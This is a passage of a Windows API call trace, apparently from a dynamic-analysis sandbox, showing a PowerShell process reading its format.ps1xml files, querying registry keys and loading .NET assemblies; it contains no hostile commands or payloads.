lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0151.520] GetLastError () returned 0x0 [0151.520] SetErrorMode (uMode=0x1) returned 0x1 [0151.521] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f824f8 | out: lpFileInformation=0x2f824f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0151.521] GetLastError () returned 0x0 [0151.521] SetErrorMode (uMode=0x1) returned 0x1 [0151.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0151.521] GetLastError () returned 0x0 [0151.521] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e6a8 | out: phkResult=0x12e6a8*=0x328) returned 0x0 [0151.521] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x0, lpcbData=0x12e6ec*=0x0 | out: lpType=0x12e6f0*=0x1, lpData=0x0, lpcbData=0x12e6ec*=0x56) returned 0x0 [0151.521] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x509ca8, lpcbData=0x12e6ec*=0x56 | out: lpType=0x12e6f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x12e6ec*=0x56) returned 0x0 [0151.521] RegCloseKey (hKey=0x328) returned 0x0 [0151.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0151.521] GetLastError () returned 0x0 [0151.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e1e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0151.522] GetLastError () returned 0x0 [0151.523] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xdf73d73c, Data2=0xd623, Data3=0x4ed2, Data4=([0]=0x8c, [1]=0xb0, [2]=0xc2, [3]=0x55, [4]=0xc4, [5]=0xea, [6]=0xbc, [7]=0xed))) returned 0x0 [0151.531] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x20a93753, Data2=0x61f8, Data3=0x4e05, Data4=([0]=0xa0, [1]=0x4e, [2]=0xda, [3]=0x85, [4]=0x7e, [5]=0xd4, [6]=0x4d, [7]=0x17))) returned 0x0 [0151.535] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x3920c9ef, Data2=0xad50, Data3=0x4de9, Data4=([0]=0xb3, [1]=0x82, [2]=0xfe, [3]=0x85, [4]=0x40, [5]=0x8, [6]=0x81, [7]=0x9e))) returned 0x0 [0151.535] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x58a5f781, Data2=0x6d68, Data3=0x4758, Data4=([0]=0x95, [1]=0x3d, [2]=0x2d, [3]=0x5f, [4]=0xe0, [5]=0x61, [6]=0x31, [7]=0xd))) returned 0x0 [0151.535] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x5f9ceacd, Data2=0xcf68, Data3=0x48a0, Data4=([0]=0xaf, [1]=0xb5, [2]=0xb6, [3]=0x7, [4]=0xff, [5]=0xc2, [6]=0xde, [7]=0xac))) returned 0x0 [0151.536] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x72f2a621, Data2=0xd2a5, Data3=0x4f51, Data4=([0]=0xb0, [1]=0x54, [2]=0xb4, [3]=0x34, [4]=0x19, [5]=0x7b, [6]=0xda, [7]=0xf3))) returned 0x0 [0151.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e1bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.536] GetLastError () returned 0x0 [0151.536] SetErrorMode (uMode=0x1) returned 0x1 [0151.536] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0151.536] GetLastError () returned 0x0 [0151.536] GetFileType (hFile=0x328) returned 0x1 [0151.536] SetErrorMode (uMode=0x1) returned 0x1 [0151.536] GetFileType (hFile=0x328) returned 0x1 [0151.537] ReadFile (in: hFile=0x328, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.542] GetLastError () returned 0x0 [0151.543] ReadFile (in: hFile=0x328, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.543] GetLastError () returned 0x0 [0151.544] ReadFile (in: hFile=0x328, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.544] GetLastError () returned 0x0 [0151.544] ReadFile (in: hFile=0x328, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.544] GetLastError () returned 0x0 [0151.545] ReadFile (in: hFile=0x328, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.545] GetLastError () returned 0x0 [0151.545] ReadFile (in: hFile=0x328, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x12e724*=0x1000, lpOverlapped=0x0) returned 1 [0151.545] GetLastError () returned 0x0 [0151.545] ReadFile (in: hFile=0x328, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x12e724*=0xaca, lpOverlapped=0x0) returned 1 [0151.545] GetLastError () returned 0x0 [0151.545] ReadFile (in: hFile=0x328, lpBuffer=0x2fa150a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2fa150a*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0151.545] GetLastError () returned 0x0 [0151.546] ReadFile (in: hFile=0x328, lpBuffer=0x2fa1ea0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e724, lpOverlapped=0x0 | out: lpBuffer=0x2fa1ea0*, lpNumberOfBytesRead=0x12e724*=0x0, lpOverlapped=0x0) returned 1 [0151.546] GetLastError () returned 0x0 [0151.546] CloseHandle (hObject=0x328) returned 1 [0151.546] GetLastError () returned 0x0 [0151.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e284, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.546] GetLastError () returned 0x0 [0151.546] SetErrorMode (uMode=0x1) returned 0x1 [0151.546] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2fc2e9c | out: lpFileInformation=0x2fc2e9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0151.546] GetLastError () returned 0x0 [0151.546] SetErrorMode (uMode=0x1) returned 0x1 [0151.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.546] GetLastError () returned 0x0 [0151.546] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e6a8 | out: phkResult=0x12e6a8*=0x328) returned 0x0 [0151.546] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x0, lpcbData=0x12e6ec*=0x0 | out: lpType=0x12e6f0*=0x1, lpData=0x0, lpcbData=0x12e6ec*=0x56) returned 0x0 [0151.547] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e6f0, lpData=0x509ca8, lpcbData=0x12e6ec*=0x56 | out: lpType=0x12e6f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x12e6ec*=0x56) returned 0x0 [0151.547] RegCloseKey (hKey=0x328) returned 0x0 [0151.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.547] GetLastError () returned 0x0 [0151.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e1e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.547] GetLastError () returned 0x0 [0151.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0151.564] GetLastError () returned 0x0 [0151.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0151.597] GetLastError () returned 0x57 [0151.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0151.606] GetLastError () returned 0x57 [0151.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.613] GetLastError () returned 0x57 [0151.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0151.623] GetLastError () returned 0x57 [0151.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0151.633] GetLastError () returned 0x57 [0151.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0151.678] GetLastError () returned 0x57 [0151.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0151.680] GetLastError () returned 0x57 [0151.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0151.681] GetLastError () returned 0x57 [0151.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0151.699] GetLastError () returned 0x57 [0151.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0151.709] GetLastError () returned 0x57 [0151.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0151.719] GetLastError () returned 0x57 [0151.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0151.758] GetLastError () returned 0x57 [0151.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0151.759] GetLastError () returned 0x57 [0151.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0151.764] GetLastError () returned 0x57 [0151.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a [0151.765] GetLastError () returned 0x57 [0151.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0151.765] GetLastError () returned 0x57 [0151.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0151.765] GetLastError () returned 0x57 [0151.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.766] GetLastError () returned 0x57 [0151.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.766] GetLastError () returned 0x57 [0151.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.766] GetLastError () returned 0x57 [0151.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.766] GetLastError () returned 0x57 [0151.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.766] GetLastError () returned 0x57 [0151.922] VirtualQuery (in: lpAddress=0x12d400, lpBuffer=0x12e400, dwLength=0x1c | out: lpBuffer=0x12e400*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.928] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x52cd32b8, Data2=0x40d, Data3=0x4cd2, Data4=([0]=0xb5, [1]=0xd9, [2]=0x39, [3]=0xba, [4]=0xdf, [5]=0xbf, [6]=0x60, [7]=0x1))) returned 0x0 [0151.929] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xa5ba2246, Data2=0x3e06, Data3=0x4424, Data4=([0]=0xa3, [1]=0x44, [2]=0x21, [3]=0x1d, [4]=0x27, [5]=0x9b, [6]=0x5, [7]=0xcf))) returned 0x0 [0151.929] VirtualQuery (in: lpAddress=0x12d478, lpBuffer=0x12e478, dwLength=0x1c | out: lpBuffer=0x12e478*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.929] VirtualQuery (in: lpAddress=0x12d478, lpBuffer=0x12e478, dwLength=0x1c | out: lpBuffer=0x12e478*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.929] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x37d74b9e, Data2=0xbafa, Data3=0x439a, Data4=([0]=0x85, [1]=0x6b, [2]=0x2d, [3]=0xe3, [4]=0xf, [5]=0x64, [6]=0xb3, [7]=0xb2))) returned 0x0 [0151.932] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xabd4ca77, Data2=0xb9bc, Data3=0x4af7, Data4=([0]=0x9d, [1]=0x27, [2]=0x5d, [3]=0xa2, [4]=0x1b, [5]=0xd9, [6]=0x7c, [7]=0x9c))) returned 0x0 [0151.932] VirtualQuery (in: lpAddress=0x12d5a4, lpBuffer=0x12e5a4, dwLength=0x1c | out: lpBuffer=0x12e5a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.976] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.976] VirtualQuery (in: lpAddress=0x12d450, lpBuffer=0x12e450, dwLength=0x1c | out: lpBuffer=0x12e450*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.976] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xda3cb997, Data2=0x3119, Data3=0x440e, Data4=([0]=0x9f, [1]=0x76, [2]=0x6a, [3]=0xeb, [4]=0x5f, [5]=0xea, [6]=0x8c, [7]=0x91))) returned 0x0 [0151.976] VirtualQuery (in: lpAddress=0x12d5a4, lpBuffer=0x12e5a4, dwLength=0x1c | out: lpBuffer=0x12e5a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.977] VirtualQuery (in: lpAddress=0x12d4bc, lpBuffer=0x12e4bc, dwLength=0x1c | out: lpBuffer=0x12e4bc*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.980] VirtualQuery (in: lpAddress=0x12d170, lpBuffer=0x12e170, dwLength=0x1c | out: lpBuffer=0x12e170*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.980] VirtualQuery (in: lpAddress=0x12d170, lpBuffer=0x12e170, dwLength=0x1c | out: lpBuffer=0x12e170*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.980] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x5989b186, Data2=0x9e67, Data3=0x4263, Data4=([0]=0x8a, [1]=0x4c, [2]=0x9b, [3]=0x1d, [4]=0x3d, [5]=0xf5, [6]=0x2d, [7]=0x8))) returned 0x0 [0151.980] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xba67d1f7, Data2=0x210e, Data3=0x4604, Data4=([0]=0x86, [1]=0xb2, [2]=0x1b, [3]=0x3c, [4]=0x87, [5]=0x95, [6]=0x2f, [7]=0x11))) returned 0x0 [0151.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12e1bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0151.981] GetLastError () returned 0x57 [0151.981] SetErrorMode (uMode=0x1) returned 0x1 [0151.981] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350 [0151.981] GetLastError () returned 0x0 [0151.981] GetFileType 